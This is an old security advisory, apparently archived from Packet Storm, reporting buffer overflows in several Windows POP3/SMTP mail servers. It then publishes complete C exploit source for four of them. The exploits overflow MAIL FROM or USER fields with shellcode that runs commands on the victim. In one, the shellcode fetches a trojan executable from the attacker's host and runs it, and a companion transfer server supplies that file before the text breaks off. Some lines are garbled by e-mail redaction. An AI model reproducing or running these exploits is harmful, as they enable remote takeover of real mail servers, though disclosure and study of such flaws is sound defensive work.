
mail_bof.txt

19 Sep 1999 00:00:00 — Reported by Packet Storm. Type: packetstorm

Multiple Windows POP3/SMTP servers have buffer overflow vulnerabilities leading to remote exploits.

Code
`Subject: Many kind of POP3/SMTP server softwares for Windows have buffer  
overflow bug  
To: [email protected]   
  
  
Many kind of POP3/SMTP server softwares for Windows have buffer overflow bug  
(by The Shadow Penguin Security http://shadowpenguin.backsection.net)  
  
  
1. Introduction  
  
  
I confirmed that many POP3/SMTP servers for Windows which are published on  
"SOFT-SEEK.com" contain buffer overflow bugs. I list the software which  
has a buffer overflow bug, and I also publish exploit programs for some of it.  
  
  
2. POP3/SMTP server softwares which have buffer overflow bugs  
  
  
Software Version Service Overflow Point  
-------------------------------------------------------  
@Work SmartServer3 3.51 SMTP long MAIL FROM:  
CMail Server 2.3 SP2 SMTP long MAIL FROM:  
Personal Mail Server 3.09 SMTP long MAIL FROM: (I've notified to developer)  
Tiny FTP daemon 0.51 POP3 long USER (I've notified, Now fixed)  
Internet Anywhere 2.2.2 POP3 long USER  
FuseMail 2.7 POP3 long USER,PASS  
aVirt Mail Server 3.3 POP/SMTP long MAIL FROM:,long USER  
  
  
If the host receives the packet which contains the exploit code, the host is  
compromised by whatever instructions are coded in the exploit code. We show the  
demonstration programs which execute any command on the victim host. For the proof  
of the risk of intrusion, I also publish the exploit program for  
"Personal Mail Server" that can send a prepared program to victim host and execute  
it. If the trojan program is sent, the victim machine will be controlled remotely.  
  
  
If the host receives the packet which contains the exploit code, the host will  
execute any instructions that are written in the exploit code. We show the  
demonstration programs which execute any command on the victim host. For the  
proof of the risk of intrusion, I publish the exploit program for  
"Personal Mail Server" that can send a trojan program which is prepared in the  
attacker host. Of course, it can be executed remotely. If the trojan program is  
sent, the victim machine will be controlled remotely.  
  
  
  
3. Exploit  
  
  
I coded the exploits for the following softwares:  
  
  
(1) @Work SmartServer3  
(2) CMail Server  
(3) FuseMail 2.7  
(4) Personal Mail Server  
(5) Tiny FTP daemon  
  
  
(5) is now fixed, so I publish the exploit programs for (1)-(4) only.  
  
  
-------------------  
  
  
(1) @Work SmartServer3  
  
  
/*=============================================================================  
NetcPlus SmartServer3 Exploit for Windows98  
The Shadow Penguin Security (http://shadowpenguin.backsection.net)  
Written by UNYUN ([email protected])  
=============================================================================  
*/  
#include <stdio.h>  
#include <string.h>  
#include <netdb.h>  
#include <netinet/in.h>  
#include <sys/socket.h>  
#include <sys/types.h>  
#include <sys/time.h>  
#include <unistd.h>  
  
  
#define BUFSIZE 2000          /* size of buf[] in main(); indices run 0..BUFSIZE-1 */
#define SMTP_PORT 25
#define RETADR 1167           /* offset in buf[] where main() writes the four EIP bytes */
#define JMPADR 1163           /* offset where main() writes the two bytes JMPS, JMPOFS */
#define JMPOFS 6
#define EIP 0xbff7a06b        /* hard-coded address for the Windows 98 build named in the header comment */
#define NOP 0x90              /* NOTE(review): unused; main() uses the literal 0x90 in memset() */
#define JMPS 0xeb
  
  
/* Machine-code payload placed after the overwritten return address. main()
 * appends cmdbuf to it with strcat() and then overwrites index 65 with a
 * length byte, so the 200-byte array must hold both parts. Byte values are
 * specific to the Windows 98 build named in the file header comment. */
unsigned char exploit_code[200]={
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,
0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,
0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,
0xFF,0x00};
/* Dot-separated names appended to exploit_code at run time. main() stores the
 * length of the tail starting at offset 23 ("welcome.exe") into the payload. */
unsigned char cmdbuf[200]="msvcrt.dll.system.exit.welcome.exe";
  
  
/*
 * Entry point: connect to argv[1]:25, read the greeting, send HELO, then send
 * one MAIL FROM whose argument is the BUFSIZE-byte buffer built below, wait
 * 100 s and close. Exits 1 on usage/resolution errors, 0 on socket/connect errors.
 *
 * NOTE(review): exit() and inet_addr() are used without <stdlib.h> and
 * <arpa/inet.h>; they rely on implicit declarations, which modern compilers
 * reject. No return value of write() is checked anywhere in this function.
 */
int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[BUFSIZE+3000],buf[BUFSIZE];   /* buf: 2000 bytes, indices 0..1999 */
int sockfd,i,ip;

if (argc<2){
printf("usage\n %s HostName\n",argv[0]);
exit(1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(SMTP_PORT);
/* Try a dotted-quad first; fall back to a name lookup when inet_addr() fails. */
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}

if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
/* Drain the server greeting up to its first newline.
 * NOTE(review): a read() that fills packetbuf completely makes packetbuf[i]
 * one past the end; a short reply is assumed. */
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}

/* Append the name string to the payload and store the length of its tail
 * (cmdbuf+23, "welcome.exe") at payload index 65. Passing an unsigned char
 * array to strcat()/strlen() is a pointer-sign mismatch. */
strcat(exploit_code,cmdbuf);
exploit_code[65]=strlen(cmdbuf+23);
/* buf layout: 0x90 filler, EIP little-endian at RETADR, (JMPS, JMPOFS) at
 * JMPADR, then the payload directly after the four address bytes. */
memset(buf,0x90,BUFSIZE);
ip=EIP;   /* EIP exceeds INT_MAX, so ip is negative; >> on it is implementation-defined, masked to 8 bits */
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[JMPADR] =JMPS;
buf[JMPADR+1]=JMPOFS;
memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
/* BUG: buf has BUFSIZE (2000) elements, so buf[2000] is one past the end —
 * an out-of-bounds write; the terminator lands outside the array. */
buf[2000]=0;

sprintf(packetbuf,"helo penguin\r\n");
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
printf("%s\n",packetbuf);
sprintf(packetbuf,"MAIL FROM: %s\r\n",buf);   /* packetbuf (5000 bytes) holds the 2000-byte buf plus framing */
write(sockfd,packetbuf,strlen(packetbuf));
sleep(100);   /* hold the connection open for 100 s before closing */
close(sockfd);
}
  
  
-------------------  
  
  
(2) CMail Server  
  
  
/*=============================================================================  
CMAIL Server 2.3 SP2 Exploit for Windows98  
The Shadow Penguin Security (http://shadowpenguin.backsection.net)  
Written by UNYUN ([email protected])  
=============================================================================  
*/  
#include <stdio.h>  
#include <string.h>  
#include <netdb.h>  
#include <netinet/in.h>  
#include <sys/socket.h>  
#include <sys/types.h>  
#include <sys/time.h>  
#include <unistd.h>  
  
  
#define BUFSIZE 2000          /* size of buf[] in main(); indices run 0..BUFSIZE-1 */
#define SMTP_PORT 25
#define RETADR 626            /* offset in buf[] where main() writes the four EIP bytes */
#define JMPADR 622            /* offset where main() writes the two bytes JMPS, JMPOFS */
#define JMPOFS 6
#define EIP 0xbff7a06b        /* hard-coded address for the Windows 98 build named in the header comment */
#define NOP 0x90              /* NOTE(review): unused; main() uses the literal 0x90 in memset() */
#define JMPS 0xeb
  
  
/* Machine-code payload placed after the overwritten return address; identical
 * to the one in listing (1). main() appends cmdbuf with strcat() and then
 * overwrites index 65 with a length byte, so the 200-byte array must hold
 * both parts. Byte values are specific to the build named in the header. */
unsigned char exploit_code[200]={
0xEB,0x4B,0x5B,0x53,0x32,0xE4,0x83,0xC3,0x0B,
0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,0xBF,0xFF,
0xD0,0x8B,0xD0,0x52,0x43,0x53,0x52,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,0xF7,
0xBF,0xFF,0xD0,0x8B,0xF0,0x5A,0x43,0x53,0x52,
0x32,0xE4,0x83,0xC3,0x04,0x88,0x23,0xB8,0x28,
0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF8,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,0xD6,
0x33,0xC0,0x50,0xFF,0xD7,0xE8,0xB0,0xFF,0xFF,
0xFF, 0x00};
/* Dot-separated names appended to exploit_code at run time. main() stores the
 * length of the tail starting at offset 23 ("welcome.exe") into the payload. */
unsigned char cmdbuf[200]="msvcrt.dll.system.exit.welcome.exe";
  
  
/*
 * Entry point: connect to argv[1]:25, read the greeting, send HELO, then send
 * one MAIL FROM carrying the BUFSIZE-byte buffer built below, wait 100 s and
 * close. Exits 1 on usage/resolution errors, 0 on socket/connect errors.
 *
 * NOTE(review): exit() and inet_addr() are used without <stdlib.h> and
 * <arpa/inet.h>; they rely on implicit declarations, which modern compilers
 * reject. No return value of write() is checked anywhere in this function.
 */
int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[BUFSIZE+3000],buf[BUFSIZE];   /* buf: 2000 bytes, indices 0..1999 */
int sockfd,i,ip;

if (argc<2){
printf("usage\n %s HostName\n",argv[0]);
exit(1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(SMTP_PORT);
/* Try a dotted-quad first; fall back to a name lookup when inet_addr() fails. */
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}

if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
/* Drain the server greeting up to its first newline.
 * NOTE(review): a read() that fills packetbuf completely makes packetbuf[i]
 * one past the end; a short reply is assumed. */
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}

/* Append the name string to the payload and store the length of its tail
 * (cmdbuf+23, "welcome.exe") at payload index 65. Passing an unsigned char
 * array to strcat()/strlen() is a pointer-sign mismatch. */
strcat(exploit_code,cmdbuf);
exploit_code[65]=strlen(cmdbuf+23);
/* buf layout: 0x90 filler, EIP little-endian at RETADR, (JMPS, JMPOFS) at
 * JMPADR, then the payload directly after the four address bytes. */
memset(buf,0x90,BUFSIZE);
ip=EIP;   /* EIP exceeds INT_MAX, so ip is negative; >> on it is implementation-defined, masked to 8 bits */
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[JMPADR] =JMPS;
buf[JMPADR+1]=JMPOFS;
memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
/* BUG: buf has BUFSIZE elements (indices 0..BUFSIZE-1), so buf[BUFSIZE] is
 * one past the end — an out-of-bounds write. */
buf[BUFSIZE]=0;

sprintf(packetbuf,"helo penguin\r\n");
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
printf("%s\n",packetbuf);
/* NOTE(review): this format string appears mangled by the archive's e-mail
 * redaction ("%[email protected]" is not a valid printf conversion, so
 * this is undefined behaviour as written); the original text is not
 * recoverable from this page. */
sprintf(packetbuf,"MAIL FROM: aa <%[email protected]>\r\n",buf);
write(sockfd,packetbuf,strlen(packetbuf));
sleep(100);   /* hold the connection open for 100 s before closing */
close(sockfd);
}
  
  
-------------------  
  
  
(3) FuseMail 2.7  
  
  
/*=============================================================================  
FuseMail Version 2.7 Exploit for Windows98  
The Shadow Penguin Security (http://shadowpenguin.backsection.net)  
Written by UNYUN ([email protected])  
=============================================================================  
*/  
#include <stdio.h>  
#include <string.h>  
#include <netdb.h>  
#include <netinet/in.h>  
#include <sys/socket.h>  
#include <sys/types.h>  
#include <sys/time.h>  
#include <unistd.h>  
  
  
#define BUFSIZE 1159          /* length of the USER argument; main()'s buf[] is 1500 bytes, so buf[BUFSIZE] is in range */
#define RETADR 1074           /* offset in buf[] where main() writes the four JMP_ESP bytes */
#define FTP_PORT 110          /* NOTE(review): named FTP_PORT but 110 is the POP3 port (the table lists FuseMail under POP3) */
#define JMP_ESP 0xbff7a027    /* hard-coded address for the Windows 98 build named in the header comment */
  
  
/* Machine-code payload placed after the overwritten return address. main()
 * appends cmdbuf to it with strcat(), so the 200-byte array must hold both
 * parts. Byte values are specific to the build named in the file header. */
unsigned char exploit_code[200]={
0xEB,0x32,0x5B,0x53,0x32,0xE4,0x83,0xC3,
0x0B,0x4B,0x88,0x23,0xB8,0x50,0x77,0xF7,
0xBF,0xFF,0xD0,0x43,0x53,0x50,0x32,0xE4,
0x83,0xC3,0x06,0x88,0x23,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x43,0x53,
0x83,0xC3,0x0B,0x32,0xE4,0x88,0x23,0xFF,
0xD6,0x90,0xEB,0xFD,0xE8,0xC9,0xFF,0xFF,
0xFF,0x00
};
/* Dot-separated names appended to exploit_code at run time by main(). */
unsigned char cmdbuf[200]="msvcrt.dll.system.notepad.exe";
  
  
/*
 * Entry point: connect to argv[1]:110, read the greeting, send a USER line
 * whose argument is the buffer built below, read one reply, send a fixed
 * PASS line and close. Exits 1 on usage/resolution errors, 0 on socket/connect
 * errors.
 *
 * NOTE(review): exit() and inet_addr() are used without <stdlib.h> and
 * <arpa/inet.h>; they rely on implicit declarations, which modern compilers
 * reject. No return value of write() is checked anywhere in this function.
 */
int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[3000],buf[1500];   /* buf is larger than BUFSIZE (1159) */
int sockfd,i,ip;

if (argc<2){
printf("usage\n %s HostName\n",argv[0]);
exit(1);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(FTP_PORT);
/* Try a dotted-quad first; fall back to a name lookup when inet_addr() fails. */
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified host.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}

if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
/* Drain the server greeting up to its first newline.
 * NOTE(review): a read() that fills packetbuf completely makes packetbuf[i]
 * one past the end; a short reply is assumed. */
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}

/* Append the name string to the payload (pointer-sign mismatch on the
 * unsigned char array), then build buf: 'a' filler, NUL at BUFSIZE,
 * JMP_ESP little-endian at RETADR, payload directly after it. */
strcat(exploit_code,cmdbuf);
memset(buf,'a',BUFSIZE);
buf[BUFSIZE]=0;
ip=JMP_ESP;   /* JMP_ESP exceeds INT_MAX, so ip is negative; >> on it is implementation-defined, masked to 8 bits */
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
/* NOTE(review): strncpy() with n == strlen(src) copies no terminator, and
 * RETADR+4 plus the payload length appears to reach past index BUFSIZE, so
 * the NUL written above is overwritten and the "%s" below then reads
 * uninitialised bytes of buf — confirm by counting the payload. */
strncpy(buf+RETADR+4,exploit_code,strlen(exploit_code));
sprintf(packetbuf,"USER %s\r\n",buf);
write(sockfd,packetbuf,strlen(packetbuf));

/* Read one reply line (same one-past-the-end caveat as above). */
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}

memset(packetbuf,0,1024);
sprintf(packetbuf,"PASS sample\r\n");
write(sockfd,packetbuf,strlen(packetbuf));

close(sockfd);
}
  
  
-------------------  
  
  
(4) Personal Mail Server  
  
  
Prog.1 : This program sends a very small client program which fetches the trojan  
from the other host and then executes it.  
Prog.2 : Program transfer server. This is the server from which the client sent by Prog.1 fetches the program.  
  
  
  
Prog.1  
  
  
/*=============================================================================  
Personal Mail Server Version 3.072-3.09 Exploit for Windows98  
The Shadow Penguin Security (http://shadowpenguin.backsection.net)  
Written by UNYUN ([email protected])  
=============================================================================  
*/  
#include <stdio.h>  
#include <string.h>  
#include <netdb.h>  
#include <netinet/in.h>  
#include <sys/socket.h>  
#include <sys/types.h>  
#include <sys/time.h>  
#include <unistd.h>  
  
  
#define BUFSIZE 4000          /* size of buf[] in main(); indices run 0..BUFSIZE-1 */
#define SMTP_PORT 25
#define RETADR 267            /* offset in buf[] where main() writes the four EIP bytes */
#define JMPADR 263            /* offset where main() writes the two bytes JMPS, JMPOFS */
#define JMPOFS 6
#define EIP 0xbff7a06b        /* hard-coded address for the Windows 98 build named in the header comment */
#define NOP 0x90              /* NOTE(review): unused; main() uses the literal 0x90 in memset() */
#define JMPS 0xeb
  
  
/* Machine-code payload placed after the overwritten return address. It ends
 * with a NUL-terminated ASCII list of names (from 0x6D 'm' onward:
 * msvcrt.dll, wsock32.dll, WSAStartup, socket, connect, recv, closesocket,
 * fopen, fwrite, fclose, wb, x.exe, system, exit). main() patches a port at
 * indices 0xc3-0xc4 and an IPv4 address at 0xc8-0xcb before sending it;
 * byte values are otherwise specific to the build named in the header. */
unsigned char exploit_code[700]={
0xEB,0x58,0x5F,0x32,0xC0,0x8B,0xDF,0x33,0xC9,0xB1,0x09,0xFE,0xC1,0x03,0xD9,0x88,
0x03,0x88,0x47,0x16,0x88,0x47,0x21,0x88,0x47,0x28,0x88,0x47,0x30,0x88,0x47,0x35,
0x88,0x47,0x41,0x88,0x47,0x47,0x88,0x47,0x4E,0x88,0x47,0x55,0x88,0x47,0x58,0x88,
0x47,0x5E,0x88,0x47,0x65,0x88,0x47,0x6A,0x8B,0xC7,0x50,0xB8,0x50,0x77,0xF7,0xBF,
0xFF,0xD0,0x89,0x47,0x6E,0x8B,0xC7,0x33,0xC9,0xB1,0x0B,0x03,0xC1,0x50,0xB8,0x50,
0x77,0xF7,0xBF,0xFF,0xD0,0x89,0x47,0x72,0xEB,0x02,0xEB,0x72,0x8B,0xC7,0x33,0xC9,
0xB1,0x17,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,
0xF0,0x8B,0xC7,0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0x33,0xC0,0xB0,0x02,0x50,0xFF,
0xD6,0x57,0x33,0xC9,0xB1,0x82,0x03,0xF9,0x33,0xC9,0x66,0xB9,0x90,0x01,0x33,0xC0,
0xF3,0xAA,0x5F,0x8B,0xC7,0x33,0xC9,0xB1,0x22,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,
0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0x50,0x40,0x50,0x40,0x50,0xFF,
0xD6,0x89,0x47,0x76,0x8B,0xDF,0x33,0xC9,0xB1,0x82,0x03,0xD9,0xC6,0x03,0x02,0x66,
0xC7,0x43,0x02,0x1B,0x58,0xC7,0x43,0x04,0xEE,0xEE,0xEE,0xEE,0xEB,0x02,0xEB,0x56,
0x8B,0xC7,0x33,0xC9,0xB1,0x29,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,
0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0xB0,0x10,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x82,
0x03,0xC1,0x50,0xFF,0x77,0x76,0xFF,0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x42,0x03,0xC1,
0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x8B,0xC7,0x33,
0xC9,0xB1,0x56,0x03,0xC1,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x59,0x03,0xC1,0x50,0xFF,
0xD6,0x89,0x47,0x7A,0xEB,0x02,0xEB,0x63,0x8B,0xC7,0x33,0xC9,0xB1,0x31,0x03,0xC1,
0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x33,0xC0,0x50,
0x66,0xB8,0xE8,0x03,0x50,0x8B,0xC7,0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0xFF,0x77,
0x76,0xFF,0xD6,0x89,0x47,0x7E,0x33,0xDB,0x3B,0xC3,0x74,0x31,0x72,0x2F,0x8B,0xC7,
0x33,0xC9,0xB1,0x48,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,
0xD0,0x8B,0xF0,0xFF,0x77,0x7A,0xFF,0x77,0x7E,0x33,0xC0,0xB0,0x01,0x50,0x8B,0xC7,
0x33,0xC9,0xB1,0x82,0x03,0xC1,0x50,0xFF,0xD6,0xEB,0x9D,0xEB,0x6C,0x8B,0xC7,0x33,
0xC9,0xB1,0x36,0x03,0xC1,0x50,0xFF,0x77,0x72,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,
0x8B,0xF0,0xFF,0x77,0x76,0xFF,0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x4F,0x03,0xC1,0x50,
0xFF,0x77,0x6E,0xB8,0x28,0x6E,0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0xFF,0x77,0x7A,0xFF,
0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x5F,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x8B,0xF0,0x8B,0xC7,0x33,0xC9,0xB1,0x59,0x03,0xC1,0x50,0xFF,
0xD6,0x8B,0xC7,0x33,0xC9,0xB1,0x66,0x03,0xC1,0x50,0xFF,0x77,0x6E,0xB8,0x28,0x6E,
0xF7,0xBF,0xFF,0xD0,0x33,0xDB,0x53,0xFF,0xD0,0x90,0xE8,0x03,0xFE,0xFF,0xFF,0x6D,
0x73,0x76,0x63,0x72,0x74,0x2E,0x64,0x6C,0x6C,0x2C,0x77,0x73,0x6F,0x63,0x6B,0x33,
0x32,0x2E,0x64,0x6C,0x6C,0x2C,0x57,0x53,0x41,0x53,0x74,0x61,0x72,0x74,0x75,0x70,
0x2C,0x73,0x6F,0x63,0x6B,0x65,0x74,0x2C,0x63,0x6F,0x6E,0x6E,0x65,0x63,0x74,0x2C,
0x72,0x65,0x63,0x76,0x2C,0x63,0x6C,0x6F,0x73,0x65,0x73,0x6F,0x63,0x6B,0x65,0x74,
0x2C,0x66,0x6F,0x70,0x65,0x6E,0x2C,0x66,0x77,0x72,0x69,0x74,0x65,0x2C,0x66,0x63,
0x6C,0x6F,0x73,0x65,0x2C,0x77,0x62,0x2C,0x78,0x2E,0x65,0x78,0x65,0x2C,0x73,0x79,
0x73,0x74,0x65,0x6D,0x2C,0x65,0x78,0x69,0x74,0x2C,0x2C,0x2C,0x2C,0x00
};
  
  
/*
 * Entry point: argv[1] is the SMTP host, argv[2] the host whose address and
 * port 7000 are patched into the payload (the prose above pairs this with
 * Prog.2, which listens on PORT_NUM 7000). Connects to argv[1]:25, reads the
 * greeting, sends HELO, then one MAIL FROM carrying the buffer built below,
 * and closes. Exits 1 on usage/resolution errors, 0 on socket/connect errors.
 *
 * NOTE(review): exit() and inet_addr() are used without <stdlib.h> and
 * <arpa/inet.h>; they rely on implicit declarations, which modern compilers
 * reject. No return value of write() is checked anywhere in this function.
 */
int main(int argc,char *argv[])
{
struct hostent *hs;
struct sockaddr_in cli;
char packetbuf[BUFSIZE+3000],buf[BUFSIZE];   /* buf: 4000 bytes, indices 0..3999 */
int sockfd,i;
unsigned int ip,port,yourip;

if (argc<3){
printf("usage\n %s VictimHostName YourHostName\n",argv[0]);
exit(1);
}
/* Resolve argv[2]; yourip ends up in network byte order either way. */
if ((yourip=inet_addr(argv[2]))==-1){
if ((hs=gethostbyname(argv[2]))==NULL){
printf("Can not resolve specified YourHost.\n");
exit(1);
}
memcpy((caddr_t)&yourip,hs->h_addr,hs->h_length);
}
bzero(&cli, sizeof(cli));
cli.sin_family = AF_INET;
cli.sin_port = htons(SMTP_PORT);
/* Try a dotted-quad first; fall back to a name lookup when inet_addr() fails. */
if ((cli.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if ((hs=gethostbyname(argv[1]))==NULL){
printf("Can not resolve specified VictimHost.\n");
exit(1);
}
cli.sin_family = hs->h_addrtype;
memcpy((caddr_t)&cli.sin_addr.s_addr,hs->h_addr,hs->h_length);
}

if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0){
perror("socket"); exit(0);
}

if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0){
perror("connect"); exit(0);
}
/* Drain the server greeting up to its first newline.
 * NOTE(review): a read() that fills packetbuf completely makes packetbuf[i]
 * one past the end; a short reply is assumed. */
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
printf("1:%s\n",packetbuf);

/* buf layout: 0x90 filler, EIP little-endian at RETADR, (JMPS, JMPOFS) at
 * JMPADR, then the payload directly after the four address bytes. */
memset(buf,0x90,BUFSIZE);
/* NOTE(review): dead store — RETADR is 267, so these four bytes are
 * overwritten immediately below. */
for (i=267;i<271;i++) buf[i]=0x30;
ip=EIP;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
buf[JMPADR] =JMPS;
buf[JMPADR+1]=JMPOFS;

/* Patch the port (big-endian) and argv[2]'s address into the payload at fixed
 * offsets. yourip is already in network order; htonl() on it followed by the
 * >>24..>>0 extraction writes the octets in wire order on a little-endian
 * host — result on a big-endian host not verified. */
port=7000;
exploit_code[0xc3]=(port>>8) & 0xff;
exploit_code[0xc4]=port & 0xff;
ip=htonl(yourip);
exploit_code[0xc8]=(ip>>24) & 0xff;
exploit_code[0xc9]=(ip>>16) & 0xff;
exploit_code[0xca]=(ip>>8) & 0xff;
exploit_code[0xcb]=ip & 0xff;

memcpy(buf+RETADR+4,exploit_code,strlen(exploit_code));   /* pointer-sign mismatch on strlen() */
/* BUG: buf has BUFSIZE elements (indices 0..BUFSIZE-1), so buf[BUFSIZE] is
 * one past the end — an out-of-bounds write. */
buf[BUFSIZE]=0;

sprintf(packetbuf,"helo penguin\r\n");
write(sockfd,packetbuf,strlen(packetbuf));
while((i=read(sockfd,packetbuf,sizeof(packetbuf))) > 0){
packetbuf[i]=0;
if(strchr(packetbuf,'\n')!=NULL) break;
}
printf("%s\n",packetbuf);
sprintf(packetbuf,"MAIL FROM: %s\r\n",buf);   /* packetbuf (7000 bytes) holds the 4000-byte buf plus framing */
write(sockfd,packetbuf,strlen(packetbuf));
close(sockfd);
}
  
  
Prog.2  
  
  
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <arpa/inet.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
  
  
#define PORT_NUM 7000        /* listening port; matches the port=7000 that Prog.1 patches into its payload */
#define BUFSIZE 1000         /* fread()/write() chunk size in main() */
#define SENDFILE "test.exe"  /* file streamed to the first client; the demonstration below names test.exe */
  
  
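/*
 * Open a listening TCP socket on `port` (all interfaces), accept one client
 * and return the connected socket.
 *
 * port     : TCP port to listen on, host byte order.
 * listener : if non-NULL, receives the listening socket so the caller can
 *            close it; it is left open here.
 * Returns the accepted socket descriptor, or -1 if accept() failed (errno
 * set). Exits the process with status 1 if socket(), bind() or listen()
 * fails, matching the original error policy for socket()/bind().
 */
int get_connection(int port, int *listener)
{
    struct sockaddr_in address, acc;
    socklen_t acclen = sizeof acc;   /* accept() requires socklen_t, not int */
    int reuse_addr = 1;

    memset(&address, 0, sizeof address);
    address.sin_family = AF_INET;
    address.sin_port = htons((unsigned short)port);
    address.sin_addr.s_addr = htonl(INADDR_ANY);

    int listening_socket = socket(AF_INET, SOCK_STREAM, 0);
    if (listening_socket < 0) {
        perror("socket");
        exit(1);
    }
    if (listener != NULL) {
        *listener = listening_socket;
    }
    /* Best effort: allows a quick restart while the previous socket is in TIME_WAIT. */
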